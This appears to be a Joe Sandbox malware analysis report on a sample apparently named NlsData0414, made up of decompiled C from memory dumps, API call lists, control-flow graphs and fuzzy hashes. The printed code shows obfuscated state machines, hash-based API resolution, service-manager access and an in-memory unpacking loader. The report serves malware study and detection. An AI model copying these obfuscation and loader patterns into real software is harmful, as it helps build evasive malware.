                                                        0x002b508a
                                                        0x00000000
                                                        0x002b5090
                                                        0x002b509a
                                                        0x002b50a8
                                                        0x002b505c
                                                        0x002b505c
                                                        0x00000000
                                                        0x002b505c
                                                        0x002b505c
                                                        0x002b508a
                                                        0x002b5082
                                                        0x002b507a
                                                        0x00000000
                                                        0x002b5078

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,002B8AC8,?,3251FEFE,?,?), ref: 002B5355
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true
                                                        • Associated: 0000000B.00000002.2275502828.00000000002B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275638046.00000000002BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275727314.00000000002BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2b0000_NlsData0414.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: ad3a02e22a83bc36962d8c9ded50602a4da31010a75efda651fab0020ceadba4
                                                        • Instruction ID: 50562a1ebfb740f0c21a532652fe597b269b4631ccdcf585efd4988bafd1f001
                                                        • Opcode Fuzzy Hash: ad3a02e22a83bc36962d8c9ded50602a4da31010a75efda651fab0020ceadba4
                                                        • Instruction Fuzzy Hash: 2481F631B347224BDF14AF7C9C957EA36EAABA47C4F010529F855DF252EA30DD204B81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        C-Code - Quality: 73%
                                                        			E002B9860() {
                                                        				char _v524;
                                                        				unsigned int _v528;
                                                        				char _v536;
                                                        				void* _v544;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t28;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t37;
                                                        				void* _t39;
                                                        				void* _t40;
                                                        				void* _t47;
                                                        				void* _t49;
                                                        				void* _t50;
                                                        				void* _t53;
                                                        				void* _t56;
                                                        				intOrPtr* _t60;
                                                        				intOrPtr _t62;
                                                        				void* _t64;
                                                        				void* _t69;
                                                        				void* _t72;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				intOrPtr _t94;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        
                                                        				_t64 = 0;
                                                        				_t28 = 0x29f9e503;
                                                        				_t92 = _v528;
                                                        				_t2 = _t64 + 1; // 0x1
                                                        				_t94 = _t2;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t97 = _t28 - 0x13fee53b;
                                                        						if(_t97 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t97 == 0) {
                                                        							__eflags =  *0x2be310;
                                                        							if( *0x2be310 == 0) {
                                                        								 *0x2be310 = E002B3E60(_t64, E002B3F00(0x26f5757c), 0x9ba7cd1, _t94);
                                                        							}
                                                        							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                        							_t92 = _t49;
                                                        							__eflags = _t92;
                                                        							if(_t92 == 0) {
                                                        								_t28 = 0x23c48583;
                                                        							} else {
                                                        								_t50 =  *0x2be54c; // 0x5be1f8
                                                        								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
                                                        								_t28 = 0xc471eb;
                                                        							}
                                                        							continue;
                                                        						} else {
                                                        							_t98 = _t28 - 0x9835f84;
                                                        							if(_t98 > 0) {
                                                        								__eflags = _t28 - 0xc0f0991;
                                                        								if(_t28 != 0xc0f0991) {
                                                        									goto L36;
                                                        								} else {
                                                        									_t69 =  *0x2bdbd8;
                                                        									__eflags = _t69;
                                                        									if(_t69 == 0) {
                                                        										_t69 = E002B3E60(_t64, E002B3F00(0xd9518805), 0x141622d6, _t94);
                                                        										 *0x2bdbd8 = _t69;
                                                        									}
                                                        									_t53 =  *0x2be54c; // 0x5be1f8
                                                        									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
                                                        									__eflags = _t56;
                                                        									_t28 = 0x9835f84;
                                                        									_t64 =  ==  ? _t94 : _t64;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t98 == 0) {
                                                        									E002B7C60(_t94);
                                                        									_t28 = 0x6addd5c;
                                                        									continue;
                                                        								} else {
                                                        									if(_t28 == 0xc471eb) {
                                                        										_v528 = 0xc1a3;
                                                        										_t28 = 0x179ed98e;
                                                        										_v528 = _v528 + 0xffff1ad7;
                                                        										_v528 = _v528 ^ 0xffffdc53;
                                                        										continue;
                                                        									} else {
                                                        										if(_t28 != 0x6addd5c) {
                                                        											goto L36;
                                                        										} else {
                                                        											_t60 =  *0x2be3f4;
                                                        											if(_t60 == 0) {
                                                        												_t60 = E002B3E60(_t64, E002B3F00(0x9bab0b12), 0x7dc9b9bb, _t94);
                                                        												 *0x2be3f4 = _t60;
                                                        											}
                                                        											 *_t60(0,  &_v524, 0x104);
                                                        											_t62 = E002B3D00( &_v536);
                                                        											_t72 =  *0x2be54c; // 0x5be1f8
                                                        											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
                                                        											_t28 = 0x39ea8110;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L42:
                                                        					}
                                                        					__eflags = _t28 - 0x29f9e503;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t28 - 0x39ea8110;
                                                        						if(_t28 == 0x39ea8110) {
                                                        							_t29 =  *0x2bdbd8;
                                                        							__eflags = _t29;
                                                        							if(_t29 == 0) {
                                                        								_t29 = E002B3E60(_t64, E002B3F00(0xd9518805), 0x141622d6, _t94);
                                                        								 *0x2bdbd8 = _t29;
                                                        							}
                                                        							 *_t29(0, 0x25, 0, 0,  &_v524);
                                                        							_t31 =  *0x2be54c; // 0x5be1f8
                                                        							_t32 = _t31 + 0x234;
                                                        							__eflags = _t31 + 0x234;
                                                        							E002B3040(_t32);
                                                        							goto L41;
                                                        						} else {
                                                        							goto L36;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							_t37 =  *0x2be494;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E002B3E60(_t64, E002B3F00(0x9bab0b12), 0x7facde30, _t94);
                                                        								 *0x2be494 = _t37;
                                                        							}
                                                        							_t93 =  *_t37();
                                                        							_t39 =  *0x2bdd18;
                                                        							__eflags = _t39;
                                                        							if(_t39 == 0) {
                                                        								_t39 = E002B3E60(_t64, E002B3F00(0x9bab0b12), 0x9ff0609c, _t94);
                                                        								 *0x2bdd18 = _t39;
                                                        							}
                                                        							_t40 =  *_t39(_t93, 8, 0x480);
                                                        							 *0x2be54c = _t40;
                                                        							__eflags = _t40;
                                                        							if(_t40 == 0) {
                                                        								L41:
                                                        								return _t64;
                                                        							} else {
                                                        								 *((intOrPtr*)(_t40 + 4)) = E002B7E40;
                                                        								_t28 = 0x13fee53b;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							__eflags = _t28 - 0x179ed98e;
                                                        							if(_t28 == 0x179ed98e) {
                                                        								__eflags =  *0x2be18c;
                                                        								if( *0x2be18c == 0) {
                                                        									 *0x2be18c = E002B3E60(_t64, E002B3F00(0x26f5757c), 0x268fe5f0, _t94);
                                                        								}
                                                        								CloseServiceHandle(_t92); // executed
                                                        								_t28 = 0xc0f0991;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t28 - 0x23c48583;
                                                        								if(_t28 != 0x23c48583) {
                                                        									goto L36;
                                                        								} else {
                                                        									_v528 = 0x5332;
                                                        									_v528 = _v528 << 6;
                                                        									_v528 = _v528 >> 0xf;
                                                        									_v528 = _v528 + 0xffffb18f;
                                                        									_v528 = _v528 >> 3;
                                                        									_v528 = _v528 ^ 0x1ffff62b;
                                                        									_t47 =  *0x2be54c; // 0x5be1f8
                                                        									 *((intOrPtr*)(_t47 + 8)) = 0x2b7e30;
                                                        									_t28 = 0xc0f0991;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L42;
                                                        					L36:
                                                        					__eflags = _t28 - 0x305b3459;
                                                        				} while (_t28 != 0x305b3459);
                                                        				return _t64;
                                                        				goto L42;
                                                        			}






























                                                        0x002b9868
                                                        0x002b986a
                                                        0x002b9871
                                                        0x002b9875
                                                        0x002b9875
                                                        0x002b9878
                                                        0x002b9880
                                                        0x002b9880
                                                        0x002b9880
                                                        0x002b9880
                                                        0x002b9885
                                                        0x00000000
                                                        0x00000000
                                                        0x002b988b
                                                        0x002b9993
                                                        0x002b9995
                                                        0x002b99ad
                                                        0x002b99ad
                                                        0x002b99bb
                                                        0x002b99bd
                                                        0x002b99bf
                                                        0x002b99c1
                                                        0x002b99d8
                                                        0x002b99c3
                                                        0x002b99c3
                                                        0x002b99c8
                                                        0x002b99ce
                                                        0x002b99ce
                                                        0x00000000
                                                        0x002b9891
                                                        0x002b9891
                                                        0x002b9896
                                                        0x002b9936
                                                        0x002b993b
                                                        0x00000000
                                                        0x002b9941
                                                        0x002b9941
                                                        0x002b9947
                                                        0x002b9949
                                                        0x002b9961
                                                        0x002b9963
                                                        0x002b9963
                                                        0x002b9969
                                                        0x002b997d
                                                        0x002b997f
                                                        0x002b9981
                                                        0x002b9986
                                                        0x00000000
                                                        0x002b9986
                                                        0x002b989c
                                                        0x002b989c
                                                        0x002b9927
                                                        0x002b992c
                                                        0x00000000
                                                        0x002b98a2
                                                        0x002b98a7
                                                        0x002b9905
                                                        0x002b990d
                                                        0x002b9912
                                                        0x002b991a
                                                        0x00000000
                                                        0x002b98a9
                                                        0x002b98ae
                                                        0x00000000
                                                        0x002b98b4
                                                        0x002b98b4
                                                        0x002b98bb
                                                        0x002b98ce
                                                        0x002b98d3
                                                        0x002b98d3
                                                        0x002b98e4
                                                        0x002b98ea
                                                        0x002b98ef
                                                        0x002b98f5
                                                        0x002b98fb
                                                        0x00000000
                                                        0x002b98fb
                                                        0x002b98ae
                                                        0x002b98a7
                                                        0x002b989c
                                                        0x002b9896
                                                        0x00000000
                                                        0x002b988b
                                                        0x002b99e2
                                                        0x002b99e7
                                                        0x002b9ae3
                                                        0x002b9ae8
                                                        0x002b9b02
                                                        0x002b9b07
                                                        0x002b9b09
                                                        0x002b9b1c
                                                        0x002b9b21
                                                        0x002b9b21
                                                        0x002b9b33
                                                        0x002b9b35
                                                        0x002b9b3e
                                                        0x002b9b3e
                                                        0x002b9b44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x002b99ed
                                                        0x002b99ed
                                                        0x002b9a73
                                                        0x002b9a78
                                                        0x002b9a7a
                                                        0x002b9a8d
                                                        0x002b9a92
                                                        0x002b9a92
                                                        0x002b9a99
                                                        0x002b9a9b
                                                        0x002b9aa0
                                                        0x002b9aa2
                                                        0x002b9ab5
                                                        0x002b9aba
                                                        0x002b9aba
                                                        0x002b9ac7
                                                        0x002b9ac9
                                                        0x002b9ace
                                                        0x002b9ad0
                                                        0x002b9b4f
                                                        0x002b9b58
                                                        0x002b9ad2
                                                        0x002b9ad2
                                                        0x002b9ad9
                                                        0x00000000
                                                        0x002b9ad9
                                                        0x002b99f3
                                                        0x002b99f3
                                                        0x002b99f8
                                                        0x002b9a47
                                                        0x002b9a49
                                                        0x002b9a61
                                                        0x002b9a61
                                                        0x002b9a67
                                                        0x002b9a69
                                                        0x00000000
                                                        0x002b99fa
                                                        0x002b99fa
                                                        0x002b99ff
                                                        0x00000000
                                                        0x002b9a05
                                                        0x002b9a05
                                                        0x002b9a0d
                                                        0x002b9a12
                                                        0x002b9a17
                                                        0x002b9a1f
                                                        0x002b9a24
                                                        0x002b9a2c
                                                        0x002b9a31
                                                        0x002b9a38
                                                        0x00000000
                                                        0x002b9a38
                                                        0x002b99ff
                                                        0x002b99f8
                                                        0x002b99ed
                                                        0x00000000
                                                        0x002b9aea
                                                        0x002b9aea
                                                        0x002b9aea
                                                        0x002b9b01
                                                        0x00000000

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,005BE1E0), ref: 002B997D
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 002B99BB
                                                        • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 002B9A67
                                                        • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 002B9B33
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true
                                                        • Associated: 0000000B.00000002.2275502828.00000000002B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275638046.00000000002BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275727314.00000000002BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2b0000_NlsData0414.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$CloseHandleManagerOpenService
                                                        • String ID: 2S$Y4[0
                                                        • API String ID: 2382770032-4131004879
                                                        • Opcode ID: cde86b1fb238a4fd388b97751115f6073f4324e7f062fd98f6b0734b9c80957b
                                                        • Instruction ID: f6bf3f1c9532c1a33489d5e01c1def2bdc6b96c241b987d1dd5115419ab83a72
                                                        • Opcode Fuzzy Hash: cde86b1fb238a4fd388b97751115f6073f4324e7f062fd98f6b0734b9c80957b
                                                        • Instruction Fuzzy Hash: F661F8307243024BDB28EF6CAC997FA3295EBA1788F15041DF245DB351EA70DDA58B92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 105 2b8400-2b84df 106 2b84e3-2b84e9 105->106 107 2b85c8-2b85ce 106->107 108 2b84ef 106->108 109 2b8630-2b8637 107->109 110 2b85d0-2b85d6 107->110 111 2b866c-2b86b4 call 2bb6e0 108->111 112 2b84f5-2b84fb 108->112 118 2b8639-2b864f call 2b3f00 call 2b3e60 109->118 119 2b8654-2b8667 109->119 113 2b85d8-2b85e0 110->113 114 2b85b1-2b85b7 110->114 120 2b85bd-2b85c7 111->120 133 2b86ba 111->133 115 2b854a-2b8551 112->115 116 2b84fd-2b8503 112->116 123 2b85e2-2b85fa call 2b3f00 call 2b3e60 113->123 124 2b8600-2b8624 CreateFileW 113->124 114->106 114->120 121 2b856e-2b8591 115->121 122 2b8553-2b8569 call 2b3f00 call 2b3e60 115->122 125 2b8543-2b8548 116->125 126 2b8505-2b850b 116->126 118->119 119->106 148 2b85ae 121->148 149 2b8593-2b85a9 call 2b3f00 call 2b3e60 121->149 122->121 123->124 124->120 134 2b8626-2b862b 124->134 125->106 126->114 132 2b8511-2b8518 126->132 139 2b851a-2b8530 call 2b3f00 call 2b3e60 132->139 140 2b8535-2b8541 132->140 142 2b86bc-2b86be 133->142 143 2b86c4-2b86d1 133->143 134->106 139->140 140->106 142->120 142->143 148->114 149->148
                                                        C-Code - Quality: 66%
                                                        			E002B8400(void* __ebx, void* __ebp) {
                                                        				short _v524;
                                                        				char _v564;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				signed int _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				intOrPtr _v596;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t92;
                                                        				intOrPtr* _t93;
                                                        				void* _t95;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        				void* _t99;
                                                        				void* _t100;
                                                        				void* _t101;
                                                        				signed int _t119;
                                                        				void* _t121;
                                                        				void* _t122;
                                                        				signed int _t123;
                                                        				intOrPtr _t124;
                                                        				void* _t126;
                                                        				void* _t129;
                                                        
                                                        				_t126 = __ebp;
                                                        				_t101 = __ebx;
                                                        				_v584 = 0xdbec;
                                                        				_v584 = _v584 + 0xa437;
                                                        				_v584 = _v584 | 0x0afcf5fb;
                                                        				_v584 = _v584 ^ 0x9493ba05;
                                                        				_v584 = _v584 >> 0xc;
                                                        				_v584 = _v584 >> 0xb;
                                                        				_v584 = _v584 ^ 0x000001bc;
                                                        				_v592 = 0x7d19;
                                                        				_v592 = _v592 << 9;
                                                        				_v592 = _v592 >> 0xe;
                                                        				_v592 = _v592 + 0xffff07e5;
                                                        				_v592 = _v592 | 0x8aea6eef;
                                                        				_v592 = _v592 + 0xd867;
                                                        				_v592 = _v592 + 0x9c41;
                                                        				_v592 = _v592 + 0x3de0;
                                                        				_v592 = _v592 + 0x218b;
                                                        				_v592 = _v592 ^ 0x00014403;
                                                        				_v588 = 0x2591;
                                                        				_t123 = 0x4a20241;
                                                        				_v588 = _v588 * 0x7d;
                                                        				_v588 = _v588 + 0x8d68;
                                                        				_v588 = _v588 + 0xffff8911;
                                                        				_v588 = _v588 * 0x6a;
                                                        				_v588 = _v588 + 0xffff93d5;
                                                        				_v588 = _v588 ^ 0x07a13cd2;
                                                        				_v580 = 0x789;
                                                        				_v580 = _v580 >> 1;
                                                        				_v580 = _v580 ^ 0xaee58af2;
                                                        				_v580 = _v580 ^ 0xaee58936;
                                                        				_t122 = _v580;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t129 = _t123 - 0x1aed34c4;
                                                        						if(_t129 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t129 == 0) {
                                                        							_v580 = 0xa8c00;
                                                        							_v576 = 0;
                                                        							_v596 = E002BB6E0(_v580, _v576, 0x989680, 0);
                                                        							_v592 = _t119;
                                                        							_t121 = _v588 - _v564;
                                                        							_t124 = _v596;
                                                        							asm("sbb ecx, [esp+0x3c]");
                                                        							__eflags = _v584 - _v592;
                                                        							if(__eflags < 0) {
                                                        								goto L16;
                                                        							} else {
                                                        								if(__eflags > 0) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									__eflags = _t121 - _t124;
                                                        									if(_t121 < _t124) {
                                                        										goto L16;
                                                        									} else {
                                                        										goto L29;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(_t123 == 0x12f5064) {
                                                        								_t82 =  *0x2bdec0;
                                                        								__eflags = _t82;
                                                        								if(_t82 == 0) {
                                                        									_t99 = E002B3F00(0x9bab0b12);
                                                        									_t119 = 0x8b0c7279;
                                                        									_t82 = E002B3E60(_t101, _t99, 0x8b0c7279, _t126);
                                                        									 *0x2bdec0 = _t82;
                                                        								}
                                                        								 *_t82(_t122, 0,  &_v564, 0x28);
                                                        								asm("sbb esi, esi");
                                                        								_t85 =  *0x2bde3c;
                                                        								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
                                                        								__eflags = _t85;
                                                        								if(_t85 == 0) {
                                                        									_t98 = E002B3F00(0x9bab0b12);
                                                        									_t119 = 0x20de7595;
                                                        									_t85 = E002B3E60(_t101, _t98, 0x20de7595, _t126);
                                                        									 *0x2bde3c = _t85;
                                                        								}
                                                        								 *_t85(_t122);
                                                        								goto L15;
                                                        							} else {
                                                        								if(_t123 == 0x4a20241) {
                                                        									_t123 = 0x33602029;
                                                        									continue;
                                                        								} else {
                                                        									if(_t123 != 0xd59c266) {
                                                        										goto L15;
                                                        									} else {
                                                        										_t93 =  *0x2be1d4;
                                                        										if(_t93 == 0) {
                                                        											_t97 = E002B3F00(0x9bab0b12);
                                                        											_t119 = 0xa229df38;
                                                        											_t93 = E002B3E60(_t101, _t97, 0xa229df38, _t126);
                                                        											 *0x2be1d4 = _t93;
                                                        										}
                                                        										 *_t93( &_v572);
                                                        										_t123 = 0x1aed34c4;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t123 - 0x33602029;
                                                        					if(_t123 == 0x33602029) {
                                                        						_t75 =  *0x2be3f4;
                                                        						__eflags = _t75;
                                                        						if(_t75 == 0) {
                                                        							_t100 = E002B3F00(0x9bab0b12);
                                                        							_t119 = 0x7dc9b9bb;
                                                        							_t75 = E002B3E60(_t101, _t100, 0x7dc9b9bb, _t126);
                                                        							 *0x2be3f4 = _t75;
                                                        						}
                                                        						 *_t75(0,  &_v524, 0x104);
                                                        						_t123 = 0x3ae77736;
                                                        						goto L1;
                                                        					} else {
                                                        						__eflags = _t123 - 0x3ae77736;
                                                        						if(_t123 != 0x3ae77736) {
                                                        							goto L15;
                                                        						} else {
                                                        							__eflags =  *0x2bde04;
                                                        							if( *0x2bde04 == 0) {
                                                        								_t95 = E002B3F00(0x9bab0b12);
                                                        								_t119 = 0xb66d748a;
                                                        								 *0x2bde04 = E002B3E60(_t101, _t95, 0xb66d748a, _t126);
                                                        							}
                                                        							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
                                                        							_t122 = _t92;
                                                        							__eflags = _t122 - 0xffffffff;
                                                        							if(_t122 == 0xffffffff) {
                                                        								break;
                                                        							} else {
                                                        								_t123 = 0x12f5064;
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L15:
                                                        					__eflags = _t123 - 0x13ef6fdf;
                                                        				} while (_t123 != 0x13ef6fdf);
                                                        				L16:
                                                        				__eflags = 0;
                                                        				return 0;
                                                        				goto L30;
                                                        			}






























                                                        0x002b8400
                                                        0x002b8400
                                                        0x002b8406
                                                        0x002b840e
                                                        0x002b8416
                                                        0x002b841e
                                                        0x002b8426
                                                        0x002b842b
                                                        0x002b8430
                                                        0x002b8438
                                                        0x002b8440
                                                        0x002b8445
                                                        0x002b844a
                                                        0x002b8452
                                                        0x002b845a
                                                        0x002b8462
                                                        0x002b846a
                                                        0x002b8472
                                                        0x002b847a
                                                        0x002b8482
                                                        0x002b8491
                                                        0x002b8496
                                                        0x002b849a
                                                        0x002b84a2
                                                        0x002b84af
                                                        0x002b84b3
                                                        0x002b84bb
                                                        0x002b84c3
                                                        0x002b84cb
                                                        0x002b84cf
                                                        0x002b84d7
                                                        0x002b84df
                                                        0x002b84df
                                                        0x002b84e3
                                                        0x002b84e3
                                                        0x002b84e3
                                                        0x002b84e3
                                                        0x002b84e9
                                                        0x00000000
                                                        0x00000000
                                                        0x002b84ef
                                                        0x002b866e
                                                        0x002b8676
                                                        0x002b8696
                                                        0x002b869a
                                                        0x002b86a2
                                                        0x002b86a6
                                                        0x002b86aa
                                                        0x002b86b2
                                                        0x002b86b4
                                                        0x00000000
                                                        0x002b86ba
                                                        0x002b86ba
                                                        0x002b86c5
                                                        0x002b86d1
                                                        0x002b86bc
                                                        0x002b86bc
                                                        0x002b86be
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x002b86be
                                                        0x002b86ba
                                                        0x002b84f5
                                                        0x002b84fb
                                                        0x002b854a
                                                        0x002b854f
                                                        0x002b8551
                                                        0x002b8558
                                                        0x002b855d
                                                        0x002b8564
                                                        0x002b8569
                                                        0x002b8569
                                                        0x002b8578
                                                        0x002b857c
                                                        0x002b857e
                                                        0x002b8589
                                                        0x002b858f
                                                        0x002b8591
                                                        0x002b8598
                                                        0x002b859d
                                                        0x002b85a4
                                                        0x002b85a9
                                                        0x002b85a9
                                                        0x002b85af
                                                        0x00000000
                                                        0x002b84fd
                                                        0x002b8503
                                                        0x002b8543
                                                        0x00000000
                                                        0x002b8505
                                                        0x002b850b
                                                        0x00000000
                                                        0x002b8511
                                                        0x002b8511
                                                        0x002b8518
                                                        0x002b851f
                                                        0x002b8524
                                                        0x002b852b
                                                        0x002b8530
                                                        0x002b8530
                                                        0x002b853a
                                                        0x002b853c
                                                        0x00000000
                                                        0x002b853c
                                                        0x002b850b
                                                        0x002b8503
                                                        0x002b84fb
                                                        0x00000000
                                                        0x002b84ef
                                                        0x002b85c8
                                                        0x002b85ce
                                                        0x002b8630
                                                        0x002b8635
                                                        0x002b8637
                                                        0x002b863e
                                                        0x002b8643
                                                        0x002b864a
                                                        0x002b864f
                                                        0x002b864f
                                                        0x002b8660
                                                        0x002b8662
                                                        0x00000000
                                                        0x002b85d0
                                                        0x002b85d0
                                                        0x002b85d6
                                                        0x00000000
                                                        0x002b85d8
                                                        0x002b85de
                                                        0x002b85e0
                                                        0x002b85e7
                                                        0x002b85ec
                                                        0x002b85fa
                                                        0x002b85fa
                                                        0x002b861d
                                                        0x002b861f
                                                        0x002b8621
                                                        0x002b8624
                                                        0x00000000
                                                        0x002b8626
                                                        0x002b8626
                                                        0x00000000
                                                        0x002b8626
                                                        0x002b8624
                                                        0x002b85d6
                                                        0x00000000
                                                        0x002b85b1
                                                        0x002b85b1
                                                        0x002b85b1
                                                        0x002b85bd
                                                        0x002b85bd
                                                        0x002b85c7
                                                        0x00000000

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 002B861D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true
                                                        • Associated: 0000000B.00000002.2275502828.00000000002B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275638046.00000000002BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275727314.00000000002BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2b0000_NlsData0414.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: ) `3$) `3$6w:$6w:$=
                                                        • API String ID: 823142352-4124229693
                                                        • Opcode ID: 580e1f5dd81868f08c559c9bd2d85233377d5c4cd84a3d1831c36b2182486849
                                                        • Instruction ID: 831f4bcaac3c363c3c9708794a136954a9672548d74566d35ba05403c247f280
                                                        • Opcode Fuzzy Hash: 580e1f5dd81868f08c559c9bd2d85233377d5c4cd84a3d1831c36b2182486849
                                                        • Instruction Fuzzy Hash: 85612871A183029FC718DF28C4456AFB7E9ABE0794F00891DF49997290EBB4DD14CF82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 160 2a0d60-2a0dd5 call 2a0ed0 VirtualAlloc RtlMoveMemory 164 2a0ddb-2a0dde 160->164 165 2a0ebe-2a0ec4 160->165 164->165 166 2a0de4-2a0de6 164->166 166->165 167 2a0dec-2a0df0 166->167 167->165 169 2a0df6-2a0dfd 167->169 170 2a0eaf-2a0ebb 169->170 171 2a0e03-2a0e36 call 2a1140 RtlMoveMemory 169->171 171->165 175 2a0e3c-2a0e4a VirtualAlloc 171->175 176 2a0e89-2a0ea0 RtlFillMemory 175->176 177 2a0e4c-2a0e52 175->177 176->165 183 2a0ea2-2a0ea5 176->183 178 2a0e5a-2a0e68 177->178 179 2a0e54-2a0e56 177->179 178->165 180 2a0e6a-2a0e7d RtlMoveMemory 178->180 179->178 180->165 182 2a0e7f-2a0e83 180->182 182->165 184 2a0e85 182->184 183->165 185 2a0ea7-2a0ea9 183->185 184->176 185->170 185->171
                                                        APIs
                                                          • Part of subcall function 002A0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002A0F08
                                                          • Part of subcall function 002A0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002A0F3E
                                                          • Part of subcall function 002A0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002A0F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 002A0DB4
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 002A0DC3
                                                          • Part of subcall function 002A1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,002A0EFD,00000000), ref: 002A1155
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 002A0E11
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 002A0E3D
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 002A0E6C
                                                        • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 002A0E98
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275450114.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2a0000_NlsData0414.jbxd
                                                        Similarity
                                                        • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                        • String ID:
                                                        • API String ID: 3581289920-0
                                                        • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction ID: 3f4ef585223d64f8b1f94bf32f9e03ed44efa4fecd0a17359ae8b774dc98dcb5
                                                        • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction Fuzzy Hash: 0231E3B5A143416BD314DB20CD94AAB73E9EBCA391F044D2CBA4893351DE35E8A08B62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
